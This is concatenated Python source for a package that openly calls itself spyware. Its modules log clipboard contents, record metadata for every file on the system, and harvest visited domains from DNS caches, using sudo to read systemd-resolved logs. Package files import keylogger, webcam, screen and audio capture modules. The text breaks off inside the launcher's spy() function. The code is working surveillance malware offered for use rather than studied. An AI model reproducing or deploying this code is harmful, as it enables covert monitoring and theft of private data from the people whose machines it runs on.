#!/usr/bin/env python3
# -*- coding: utf-8 -*-

"""
This package implements a spyware.
"""

###################
#    This package implements a spyware.
#    Copyright (C) 2021, 2022  Maurice Lambert

#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.

#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.

#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <https://www.gnu.org/licenses/>.
###################

__version__ = "1.0.0"
__all__ = [
    "AudioLogger",
    "CopyLogger",
    "DomainsLogger",
    "FilesLogger",
    "KeyLogger",
    "ScreenLogger",
    "WebcamLogger",
    "spyware",
]

try:
    import AudioLogger
    import CopyLogger
    import DomainsLogger
    import FilesLogger
    import KeyLogger
    import ScreenLogger
    import WebcamLogger
    from SpyWare import main as spyware
except ImportError:
    from . import AudioLogger
    from . import CopyLogger
    from . import DomainsLogger
    from . import FilesLogger
    from . import KeyLogger
    from . import ScreenLogger
    from . import WebcamLogger
    from .SpyWare import main as spyware

print(
    """
SpyWare  Copyright (C) 2021, 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
"""
)



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

###################
#    This package implements a SpyWare to capture the clipboard.
#    Copyright (C) 2021, 2022  Maurice Lambert

#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.

#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.

#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <https://www.gnu.org/licenses/>.
###################

"""
This package implements a SpyWare to capture the clipboard.

~# python3 ClipboardLogger.py clipboardSpy.conf

>>> from os import environ
>>> environ['clipboardSpy.conf'] = 'clipboardSpy.conf'
>>> from SpyWare.ClipboardLogger import clipboardSpy
>>> clipboardSpy()                    # (using env) OR
>>> clipboardSpy('clipboardSpy.conf') # (using config file name) OR
>>> clipboardSpy(argv=["ClipboardLogger.py", "clipboardSpy.conf"]) # (using argv)
"""

__version__ = "1.0.0"
__author__ = "Maurice Lambert"
__author_email__ = "mauricelambert434@gmail.com"
__maintainer__ = "Maurice Lambert"
__maintainer_email__ = "mauricelambert434@gmail.com"
__description__ = """
This package implements a SpyWare to capture the clipboard.
"""
license = "GPL-3.0 License"
__url__ = "https://github.com/mauricelambert/SpyWare"

copyright = """
SpyWare  Copyright (C) 2021, 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
"""
__license__ = license
__copyright__ = copyright

__all__ = ["Daemon", "main", "config_load"]

from os.path import join, exists, dirname
from configparser import ConfigParser
from pyperclip import paste
from sys import argv, exit
from typing import List
from os import environ
from time import sleep


class CONFIGURATIONS:

    """
    This class contains configurations.
    """

    save_filename: str = "clipboard.txt"
    internval: float = 11


def config_load(filename: str = None, argv: List[str] = argv) -> int:

    """
    This function loads the configuration using a the configuration file.
    """

    CONFIG = ConfigParser()

    default_file_name = "clipboardSpy.conf"
    default_file_path = join(dirname(__file__), default_file_name)
    env_config_file = environ.get(default_file_name)
    arg_config_file = argv[1] if len(argv) == 2 else None

    if filename is not None and exists(filename):
        CONFIG.read(filename)
    elif arg_config_file is not None and exists(arg_config_file):
        CONFIG.read(arg_config_file)
    elif env_config_file and exists(env_config_file):
        CONFIG.read(env_config_file)
    elif exists(default_file_path):
        CONFIG.read(default_file_path)
    else:
        return 1

    CONFIG = CONFIG.__dict__["_sections"]
    CONFIGURATIONS.save_filename = CONFIG.get("SAVE", {}).get(
        "filename", "clipboard.txt"
    )
    CONFIGURATIONS.internval = float(
        CONFIG.get("TIME", {}).get("internval", "11")
    )
    return 0


class Daemon:

    """
    This class implements a loop to get clipboard for ever.
    """

    def __init__(self):
        self.internval = CONFIGURATIONS.internval
        path = self.path = CONFIGURATIONS.save_filename
        create_if_not_exists(path)
        self.data_file = open(path)
        self.data = ""
        self.run = True

    def run_for_ever(self) -> None:

        """
        This function implements a loop to get clipboard for ever.
        """

        persistent_save = self.persistent_save
        internval = self.internval
        save = self.save
        counter = 0

        while self.run:
            clipboard = paste()
            counter += 1

            if len(clipboard) > 75:
                clipboard = ""
            else:
                save(clipboard)

            if counter >= 150:
                persistent_save()
                counter = 0

            if self.run:
                sleep(internval)

    def save(self, clipboard: str) -> None:

        """
        This function saves clipboard if isn't save before.
        """

        clipboard = f"{repr(clipboard)}\n"
        data_file = self.data_file
        data_file.seek(0)
        readline = data_file.readline

        data = readline()

        if clipboard in self.data:
            return None

        while data:
            if clipboard == data:
                return None
            data = readline()

        self.data += clipboard

    def persistent_save(self) -> None:

        """
        This function saves data in file.
        """

        path = self.path
        self.data_file.close()

        with open(path, "a") as file:
            file.write(self.data)

        self.data = ""
        self.data_file = open(path)


def create_if_not_exists(filename: str) -> None:

    """
    This function creates file if not exists.
    """

    if not exists(filename):
        file = open(filename, "w")
        file.write("")
        file.close()


def main(config_filename: str = None, argv: List[str] = argv) -> int:

    """
    This function starts the clipboard logger.
    """

    config_load(filename=config_filename, argv=argv)

    daemon = Daemon()
    try:
        daemon.run_for_ever()
    except KeyboardInterrupt:
        daemon.run = False

    return 0


if __name__ == "__main__":
    print(copyright)
    exit(main())



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

###################
#    This file gets all filenames and metadata.
#    Copyright (C) 2021, 2022  Maurice Lambert

#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.

#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.

#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <https://www.gnu.org/licenses/>.
###################

"""
This file gets all filenames and metadata.

~# python3 FilesLogger.py filesSpy.conf

>>> from os import environ
>>> environ['filesSpy.conf'] = 'filesSpy.conf'
>>> from SpyWare.FilesLogger import filesSpy
>>> filesSpy()                  # (using env) OR
>>> filesSpy('filesSpy.conf')   # (using config file name) OR
>>> filesSpy(argv=["FilesLogger.py", "filesSpy.conf"]) # (using argv)
"""

__version__ = "1.0.0"
__author__ = "Maurice Lambert"
__author_email__ = "mauricelambert434@gmail.com"
__maintainer__ = "Maurice Lambert"
__maintainer_email__ = "mauricelambert434@gmail.com"
__description__ = """
This file implements a complete spyware.
"""
license = "GPL-3.0 License"
__url__ = "https://github.com/mauricelambert/SpyWare"

copyright = """
SpyWare  Copyright (C) 2021, 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
"""
__license__ = license
__copyright__ = copyright

__all__ = ["Daemon", "FilesLogger", "main", "config_load"]

from os.path import normcase, isfile, join, dirname, exists
from os import scandir, DirEntry, environ
from configparser import ConfigParser
from time import strftime, localtime
from sys import argv, exit
from stat import filemode
from typing import List
from time import sleep
from enum import Enum


class CONFIGURATIONS:

    """
    This class contains configurations.
    """

    save_filename: str = "files.csv"

    file_interval = 0.1
    directory_interval = 1
    scan_interval = 86400


def config_load(filename: str = None, argv: List[str] = argv) -> int:

    """
    This function loads the configuration using a the configuration file.
    """

    CONFIG = ConfigParser()
    default_file_name = "filesSpy.conf"
    default_file_path = join(dirname(__file__), default_file_name)
    env_config_file = environ.get(default_file_name)
    arg_config_file = argv[1] if len(argv) == 2 else None

    if filename is not None and exists(filename):
        CONFIG.read(filename)
    elif arg_config_file is not None and exists(arg_config_file):
        CONFIG.read(arg_config_file)
    elif env_config_file and exists(env_config_file):
        CONFIG.read(env_config_file)
    elif exists(default_file_path):
        CONFIG.read(default_file_path)
    else:
        return 1

    CONFIG = CONFIG.__dict__["_sections"]
    CONFIGURATIONS.save_filename = CONFIG.get("SAVE", {}).get(
        "filename", "files.csv"
    )
    CONFIGURATIONS.file_interval = float(
        CONFIG.get("TIME", {}).get("file_interval", "0.1")
    )
    CONFIGURATIONS.directory_interval = float(
        CONFIG.get("TIME", {}).get("directory_interval", "1")
    )
    CONFIGURATIONS.scan_interval = float(
        CONFIG.get("TIME", {}).get("scan_interval", "86400")
    )
    return 0


class Daemon:

    """
    This class implements the loop to get filename and metadata.
    """

    def __init__(self):
        self.interval = CONFIGURATIONS.scan_interval
        self.fileslogger = FilesLogger()
        self.run = True

    def run_for_ever(self):

        """
        This function implements the loop to get filename and metadata.
        """

        fileslogger = self.fileslogger
        interval = self.interval

        while self.run:
            fileslogger.get_filenames(normcase("/"))
            if self.run:
                sleep(interval)


class FilesLogger:

    """
    This class gets filenames and metadata.
    """

    def __init__(self):
        self.directory_interval = CONFIGURATIONS.directory_interval
        self.interval = CONFIGURATIONS.file_interval
        filename = self.filename = CONFIGURATIONS.save_filename
        self.launch()
        self.data_file = open(filename)
        self.data = ""

    def launch(self):

        """
        This function starts the file logger.
        """

        filename = self.filename

        if not isfile(filename):
            with open(filename, "w") as csvfile:
                csvfile.write(
                    "name,size,access_time,modif_time,"
                    "permissions,directory,is_uid,is_gid,"
                    "modification_time\n"
                )

    def get_filenames(self, directory: str) -> None:

        """
        This function gets recursives filenames.
        """

        interval = self.interval
        metadata = self.get_data
        get_filenames = self.get_filenames

        for file in scandir(directory):
            if file.is_dir():

                sleep(interval)
                try:
                    get_filenames(join(directory, file.name))
                except PermissionError as e:
                    print(e)

            elif file.is_file():

                sleep(interval)
                try:
                    metadata(file, directory)
                except Exception as e:
                    print(e)

        self.persistent_save()

    def get_data(self, file: DirEntry, directory: str) -> None:

        """
        This function gets metadata and filename.
        """

        metadata = file.stat()
        permissions = filemode(metadata.st_mode)

        data = {
            "name": file.name,
            "size": str(metadata.st_size),
            "access_time": strftime(
                "%Y-%m-%d %H:%M:%S", localtime(metadata.st_atime)
            ),
            "modif_time": strftime(
                "%Y-%m-%d %H:%M:%S", localtime(metadata.st_mtime)
            ),
            "permissions": permissions,
            "directory": directory,
            "is_uid": str(metadata.st_uid),
            "is_gid": str(metadata.st_gid),
            "modification_time": strftime(
                "%Y-%m-%d %H:%M:%S", localtime(metadata.st_ctime)
            ),
        }

        self.save(data)

    def save(self, data: dict) -> int:

        """
        This function saves metadata if isn't save before.
        """

        new_line = ",".join(data.values()) + "\n"
        data_file = self.data_file
        data_file.seek(0)
        readline = data_file.readline

        data = readline()

        while data:
            if new_line == data:
                return None
            data = readline()

        self.data += new_line

    def persistent_save(self) -> None:

        """
        This function saves data in file.
        """

        if not self.data:
            return None

        filename = self.filename
        self.data_file.close()

        with open(filename, "a") as file:
            file.write(self.data)

        self.data = ""
        self.data_file = open(filename)


def main(config_filename: str = None, argv: List[str] = argv) -> int:

    """
    This function executes this script from the command line.
    """

    config_load(filename=config_filename, argv=argv)

    daemon = Daemon()

    try:
        daemon.run_for_ever()
    except KeyboardInterrupt:
        daemon.run = False

    return 0


if __name__ == "__main__":
    print(copyright)
    exit(main())



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

###################
#    This file implements a SpyWare for connection destinations.
#    Copyright (C) 2021, 2022  Maurice Lambert

#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.

#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.

#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <https://www.gnu.org/licenses/>.
###################

"""
This file implements a SpyWare for connection destinations.

~# python3 DomainsLogger.py domainsSpy.conf

>>> from os import environ
>>> environ['domainsSpy.conf'] = 'domainsSpy.conf'
>>> from SpyWare.DomainsLogger import domainsSpy
>>> domainsSpy()                  # (using env) OR
>>> domainsSpy('domainsSpy.conf') # (using config file name) OR
>>> domainsSpy(argv=["DomainsLogger.py", "domainsSpy.conf"]) # (using argv)
"""

__version__ = "1.0.0"
__author__ = "Maurice Lambert"
__author_email__ = "mauricelambert434@gmail.com"
__maintainer__ = "Maurice Lambert"
__maintainer_email__ = "mauricelambert434@gmail.com"
__description__ = """
This file implements a complete spyware.
"""
license = "GPL-3.0 License"
__url__ = "https://github.com/mauricelambert/SpyWare"

copyright = """
SpyWare  Copyright (C) 2021, 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
"""
__license__ = license
__copyright__ = copyright

__all__ = ["DomainsLogger", "domainsSpy", "domainsConfig"]

try:
    from .DomainsLogger import (
        Daemon,
        CacheAppData,
        CacheDNS,
        main as domainsSpy,
        config_load as domainsConfig,
    )
except ImportError:
    from DomainsLogger import (
        Daemon,
        CacheAppData,
        CacheDNS,
        main as domainsSpy,
        config_load as domainsConfig,
    )



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

###################
#    This package implements a SpyWare to record from microphone.
#    Copyright (C) 2021, 2022  Maurice Lambert

#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.

#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.

#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <https://www.gnu.org/licenses/>.
###################

"""
This package implements a SpyWare to record from microphone.

~# python3 AudioLogger.py audioSpy.conf

>>> from os import environ
>>> environ['audioSpy.conf'] = 'audioSpy.conf'
>>> from SpyWare.AudioLogger import audioSpy
>>> audioSpy()                  # (using env) OR
>>> audioSpy('audioSpy.conf') # (using config file name) OR
>>> audioSpy(argv=["AudioLogger.py", "audioSpy.conf"]) # (using argv)
"""

__version__ = "1.0.0"
__author__ = "Maurice Lambert"
__author_email__ = "mauricelambert434@gmail.com"
__maintainer__ = "Maurice Lambert"
__maintainer_email__ = "mauricelambert434@gmail.com"
__description__ = """
This module implements a SpyWare to record from microphone.
"""
license = "GPL-3.0 License"
__url__ = "https://github.com/mauricelambert/SpyWare"

copyright = """
SpyWare  Copyright (C) 2021, 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
"""
__license__ = license
__copyright__ = copyright

__all__ = ["Daemon", "audioSpy", "audioConfig"]

try:
    from .AudioLogger import (
        Daemon,
        main as audioSpy,
        config_load as audioConfig,
    )
except ImportError:
    from AudioLogger import (
        Daemon,
        main as audioSpy,
        config_load as audioConfig,
    )



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

###################
#    This file gets all filenames and metadata.
#    Copyright (C) 2021, 2022  Maurice Lambert

#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.

#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.

#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <https://www.gnu.org/licenses/>.
###################

"""
This file gets all filenames and metadata.

~# python3 FilesLogger.py filesSpy.conf

>>> from os import environ
>>> environ['filesSpy.conf'] = 'filesSpy.conf'
>>> from SpyWare.FilesLogger import filesSpy
>>> filesSpy()                  # (using env) OR
>>> filesSpy('filesSpy.conf')   # (using config file name) OR
>>> filesSpy(argv=["FilesLogger.py", "filesSpy.conf"]) # (using argv)
"""

__version__ = "1.0.0"
__author__ = "Maurice Lambert"
__author_email__ = "mauricelambert434@gmail.com"
__maintainer__ = "Maurice Lambert"
__maintainer_email__ = "mauricelambert434@gmail.com"
__description__ = """
This file implements a complete spyware.
"""
license = "GPL-3.0 License"
__url__ = "https://github.com/mauricelambert/SpyWare"

copyright = """
SpyWare  Copyright (C) 2021, 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
"""
__license__ = license
__copyright__ = copyright

__all__ = ["Daemon", "filesSpy", "filesConfig"]

try:
    from .FilesLogger import (
        Daemon,
        main as filesSpy,
        config_load as filesConfig,
    )
except ImportError:
    from FilesLogger import (
        Daemon,
        main as filesSpy,
        config_load as filesConfig,
    )



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

###################
#    This file implements a SpyWare for connection destinations.
#    Copyright (C) 2021, 2022  Maurice Lambert

#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.

#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.

#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <https://www.gnu.org/licenses/>.
###################

"""
This file implements a SpyWare for connection destinations.

~# python3 DomainsLogger.py domainsSpy.conf

>>> from os import environ
>>> environ['domainsSpy.conf'] = 'domainsSpy.conf'
>>> from SpyWare.DomainsLogger import domainsSpy
>>> domainsSpy()                  # (using env) OR
>>> domainsSpy('domainsSpy.conf') # (using config file name) OR
>>> domainsSpy(argv=["DomainsLogger.py", "domainsSpy.conf"]) # (using argv)
"""

__version__ = "1.0.0"
__author__ = "Maurice Lambert"
__author_email__ = "mauricelambert434@gmail.com"
__maintainer__ = "Maurice Lambert"
__maintainer_email__ = "mauricelambert434@gmail.com"
__description__ = """
This file implements a complete spyware.
"""
license = "GPL-3.0 License"
__url__ = "https://github.com/mauricelambert/SpyWare"

copyright = """
SpyWare  Copyright (C) 2021, 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
"""
__license__ = license
__copyright__ = copyright

__all__ = ["Daemon", "main", "CacheDNS", "CacheAppData", "config_load"]

from os.path import join, expanduser, isdir, isfile, dirname, exists
from os import device_encoding, environ, stat, access, R_OK
from re import compile as cregex, Pattern
from configparser import ConfigParser
from collections.abc import Iterator
from subprocess import Popen, PIPE
from mmap import mmap, ACCESS_READ
from threading import Thread, Lock
from traceback import print_exc
from io import TextIOWrapper
from typing import List, Set
from platform import system
from sys import argv, exit
from time import sleep
from glob import iglob


class CONFIGURATIONS:

    """
    This class contains configurations.
    """

    IS_WINDOWS = system() == "Windows"
    string_regex_domain: str = (
        r"([a-zA-Z0-9]([-_]?[a-zA-Z0-9]){0,62}\.)*"
        r"[a-zA-Z0-9]([-_]?[a-zA-Z0-9]){0,62}\.[a-zA-Z]{2,5}"
    ).encode()
    string_regex_ip: str = r"([0-9]{1,3}[.]){3}[0-9]{1,3}".encode()

    regex_domain: Pattern = cregex(string_regex_domain)
    regex_ip: Pattern = cregex(string_regex_ip)

    save_filename: str = "domains.txt"

    if IS_WINDOWS:
        commandes = (("ipconfig", "/displaydns"),)
        appdata_path = join(environ["APPDATA"], "..")
    else:
        commandes = (
            ("strings", "/var/cache/nscd/hosts"),
            ("sudo", "killall", "-USR1", "systemd-resolved"),
            ("sudo", "journalctl", "-u", "systemd-resolved"),
        )
        appdata_path = join(expanduser("~"), ".locals")

    interval_DNS: float = 600
    interval_appdata: float = 86400
    interval_reading_file: float = 0.5
    interval_domain: float = 0.5


def config_load(filename: str = None, argv: List[str] = argv) -> int:

    """
    This function loads the configuration using a the configuration file.
    """

    CONFIG = ConfigParser()

    default_file_name = "domainsSpy.conf"
    default_file_path = join(dirname(__file__), default_file_name)
    env_config_file = environ.get(default_file_name)
    arg_config_file = argv[1] if len(argv) == 2 else None

    if filename is not None and exists(filename):
        CONFIG.read(filename)
    elif arg_config_file is not None and exists(arg_config_file):
        CONFIG.read(arg_config_file)
    elif env_config_file and exists(env_config_file):
        CONFIG.read(env_config_file)
    elif exists(default_file_path):
        CONFIG.read(default_file_path)
    else:
        return 1

    CONFIG = CONFIG.__dict__["_sections"]
    CONFIGURATIONS.save_filename = CONFIG.get("SAVE", {}).get(
        "filename", "domains.txt"
    )
    CONFIGURATIONS.interval_DNS = float(
        CONFIG.get("TIME", {}).get("interval_dns", "600")
    )
    CONFIGURATIONS.interval_appdata = float(
        CONFIG.get("TIME", {}).get("interval_appdata", "86400")
    )
    CONFIGURATIONS.interval_reading_file = float(
        CONFIG.get("TIME", {}).get("interval_reading_file", "0.5")
    )
    CONFIGURATIONS.interval_domain = float(
        CONFIG.get("TIME", {}).get("interval_domain", "0.5")
    )
    return 0


class Daemon:

    """
    This class implements a loop to get connection destinations.
    """

    def __init__(self):
        self.interval_appdata = CONFIGURATIONS.interval_appdata
        self.interval_dns = CONFIGURATIONS.interval_DNS
        self.cacheAppData = CacheAppData()
        self.cacheDns = CacheDNS()
        self.lock = Lock()
        self.run = True

        filename = self.filename = CONFIGURATIONS.save_filename
        create_if_not_exists(filename)
        self.data_file = open(filename)
        self.data = []

    def run_CacheDns(self) -> None:

        """
        This function implements the loop to get destinations
        in DNS cache.
        """

        get_data_to_save = self.get_data_to_save
        persistent_save = self.persistent_save
        interval = self.interval_dns
        cacheDns = self.cacheDns
        research = cacheDns.research
        launch = cacheDns.launch
        counter = 0

        while self.run:
            launch()
            get_data_to_save(research())
            counter += 1

            if counter >= 3:
                persistent_save()
                counter = 0

            if self.run:
                sleep(interval)

    def run_AppData(self) -> None:

        """
        This function implements the loop to get destinations
        is Application data.
        """

        interval = self.interval_appdata
        path = CONFIGURATIONS.appdata_path
        domains_generator = self.cacheAppData.domains_generator
        get_data_to_save = self.get_data_to_save

        while self.run:
            for domains in domains_generator(path):
                get_data_to_save(domains)

            if self.run:
                sleep(interval)

    def get_data_to_save(self, domains: Set[bytes]) -> None:

        """
        This function saves domain if isn't save before.
        """

        domains = [domain + b"\n" for domain in domains]
        lock = self.lock
        lock.acquire()

        data_file = self.data_file
        data_file.seek(0)
        readline = data_file.readline

        data = readline()

        while data:
            for domain in domains:
                if domain == data:
                    domains.remove(domain)
            data = readline()

        if domains:
            self.data.extend(domains)

        lock.release()

    def persistent_save(self) -> None:

        """
        This function write IPs or domains if not in file.
        """

        lock = self.lock
        lock.acquire()
        self.data_file.close()
        filename = self.filename

        with open(filename, "ab") as file:
            file.write(b"".join(self.data))

        self.data_file = open(filename, "rb")
        self.data = []
        lock.release()


class CacheDNS:

    """
    This class gets and extract domains and IPs the DNS cache.
    """

    def __init__(self):
        self.extract_domains = CONFIGURATIONS.regex_domain.finditer
        self.extract_ip = CONFIGURATIONS.regex_ip.finditer
        self.commandes = CONFIGURATIONS.commandes
        self.process = None
        self.domains = []
        self.out = None
        self.ip = []

    def launch(self) -> None:

        """
        This function execute commands to get DNS cache.
        """

        out = self.out = []
        o_append = out.append

        errors = self.errors = []
        e_append = errors.append

        for commande in self.commandes:
            process = Popen(commande, stdout=PIPE, stderr=PIPE)
            out_, err = process.communicate()
            o_append(out_)
            if err:
                e_append(err)

        self.out = b"".join(out)

        returncode = process.returncode
        if errors or returncode:
            print(f"ExitCode: {returncode}\nError: {b''.join(errors)}")

    def research(self) -> List[bytes]:

        """
        This function extracts IPs and domains from commands line results.
        """

        return set(
            [m.group() for m in self.extract_ip(self.out)]
            + [m.group() for m in self.extract_domains(self.out)]
        )


class CacheAppData:

    """
    This class gets and extract domains and IPs from applications cache.
    """

    def __init__(self):
        self.data = None
        self.temp_data = None
        self.extract_ip = CONFIGURATIONS.regex_ip.finditer
        self.extract_domain = CONFIGURATIONS.regex_domain.finditer
        self.interval_reading_file = CONFIGURATIONS.interval_reading_file

    def domains_generator(self, directory: str) -> Iterator[List[bytes]]:

        """
        This function get recursives filenames.
        """

        interval = self.interval_reading_file
        domains_generator = self.domains_generator
        get_data = self.get_data

        for filename in iglob(join(directory, "*")):
            if isdir(filename):
                yield from domains_generator(join(directory, filename))
            elif isfile(filename):
                try:
                    yield get_data(join(directory, filename))
                except Exception:
                    print_exc()
                sleep(interval)

    def get_data(self, filename: str) -> None:

        """
        This function get domain and IP from data file.
        """

        size = stat(filename).st_size

        if access(filename, R_OK):
            file = open(filename)
        else:
            return []

        if size:
            data = mmap(file.fileno(), size, access=ACCESS_READ)
            found = [m.group() for m in self.extract_ip(data)] + [
                m.group() for m in self.extract_domain(data)
            ]
        else:
            found = []
        file.close()
        return found


def create_if_not_exists(filename: str) -> None:

    """
    This function creates file if not exists.
    """

    if not exists(filename):
        file = open(filename, "w")
        file.write("")
        file.close()


def main(config_filename: str = None, argv: List[str] = argv) -> int:

    """
    This function executes the file from the command line.
    """

    config_load(filename=config_filename, argv=argv)

    daemon = Daemon()
    thread = Thread(target=daemon.run_CacheDns)
    thread.start()
    try:
        daemon.run_AppData()
    except KeyboardInterrupt:
        daemon.run = False

    thread.join()
    return 0


if __name__ == "__main__":
    print(copyright)
    exit(main())



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

###################
#    This file implements a complete spyware.
#    Copyright (C) 2021, 2022  Maurice Lambert

#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.

#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.

#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <https://www.gnu.org/licenses/>.
###################

"""
This file implements a complete spyware.
"""

__version__ = "1.0.0"
__author__ = "Maurice Lambert"
__author_email__ = "mauricelambert434@gmail.com"
__maintainer__ = "Maurice Lambert"
__maintainer_email__ = "mauricelambert434@gmail.com"
__description__ = """
This file implements a complete spyware.
"""
license = "GPL-3.0 License"
__url__ = "https://github.com/mauricelambert/SpyWare"

copyright = """
SpyWare  Copyright (C) 2021, 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
"""
__license__ = license
__copyright__ = copyright

__all__ = ["spy", "join", "stop_deamons", "main", "modules"]

try:
    from ClipboardLogger.ClipboardLogger import (
        Daemon as ClipboardDaemon,
        config_load as clipboardConfig,
        CONFIGURATIONS as clipboard_config,
    )
    from DomainsLogger.DomainsLogger import (
        Daemon as DomainsDaemon,
        config_load as domainsConfig,
        CONFIGURATIONS as domains_config,
    )
    from ScreenLogger.ScreenLogger import (
        Daemon as ScreenDaemon,
        config_load as screenConfig,
        CONFIGURATIONS as screen_config,
    )
    from WebcamLogger.WebcamLogger import (
        Daemon as WebcamDaemon,
        config_load as webcamConfig,
        CONFIGURATIONS as webcam_config,
    )
    from AudioLogger.AudioLogger import (
        Daemon as AudioDaemon,
        config_load as audioConfig,
        CONFIGURATIONS as audio_config,
    )
    from FilesLogger.FilesLogger import (
        Daemon as FilesDaemon,
        config_load as filesConfig,
        CONFIGURATIONS as files_config,
    )
    from KeyLogger.KeyLogger import (
        Daemon as KeyDaemon,
        config_load as keyConfig,
        CONFIGURATIONS as key_config,
    )
except ImportError:
    from .ClipboardLogger.ClipboardLogger import (
        Daemon as ClipboardDaemon,
        config_load as clipboardConfig,
        CONFIGURATIONS as clipboard_config,
    )
    from .DomainsLogger.DomainsLogger import (
        Daemon as DomainsDaemon,
        config_load as domainsConfig,
        CONFIGURATIONS as domains_config,
    )
    from .ScreenLogger.ScreenLogger import (
        Daemon as ScreenDaemon,
        config_load as screenConfig,
        CONFIGURATIONS as screen_config,
    )
    from .WebcamLogger.WebcamLogger import (
        Daemon as WebcamDaemon,
        config_load as webcamConfig,
        CONFIGURATIONS as webcam_config,
    )
    from .AudioLogger.AudioLogger import (
        Daemon as AudioDaemon,
        config_load as audioConfig,
        CONFIGURATIONS as audio_config,
    )
    from .FilesLogger.FilesLogger import (
        Daemon as FilesDaemon,
        config_load as filesConfig,
        CONFIGURATIONS as files_config,
    )
    from .KeyLogger.KeyLogger import (
        Daemon as KeyDaemon,
        config_load as keyConfig,
        CONFIGURATIONS as key_config,
    )

from os import (
    environ,
    scandir,
    makedirs,
    rename,
    link,
    listdir,
    remove,
    chdir,
    getcwd,
)
from os.path import splitext, expanduser, basename, exists, join, dirname
from argparse import ArgumentParser, Namespace
from string import digits, ascii_letters
from sys import argv, exit, executable
from tarfile import open as tar_open
from collections.abc import Hashable
from typing import Dict, List, Tuple
from random import choices, choice
from shutil import rmtree, move
from threading import Thread
from platform import system
from getpass import getuser
from atexit import register
from glob import glob

system: str = system()

modules: Dict[str, str] = {
    "audio": "audioSpy.conf",
    "clipboard": "clipboardSpy.conf",
    "domains": "domainsSpy.conf",
    "files": "filesSpy.conf",
    "key": "keySpy.conf",
    "screen": "screenSpy.conf",
    "webcam": "webcamSpy.conf",
}


def join_all(*threads: List[Thread]) -> None:

    """
    This function join threads.
    """

    for thread in threads:
        thread.join()


def stop_deamons(*daemons: List[Thread]) -> None:

    """
    This function sent daemon's stop signal.
    """

    for daemon in daemons:
        daemon.run = False


def spy(modules: Dict[str, str]) -> int:

    """
    This function starts spy modules and stop it on KeyboardInterrupt.
    """

    EXITCODE = 0
    namespace = globals().copy()
    namespace.update(locals())
    threads = []
    daemons = []

    for module, config in modules.items():
        module = module.lower()

        config = namespace[f"{module}Config"](config)
        daemon = namespace[f"{module.title()}Daemon"]()

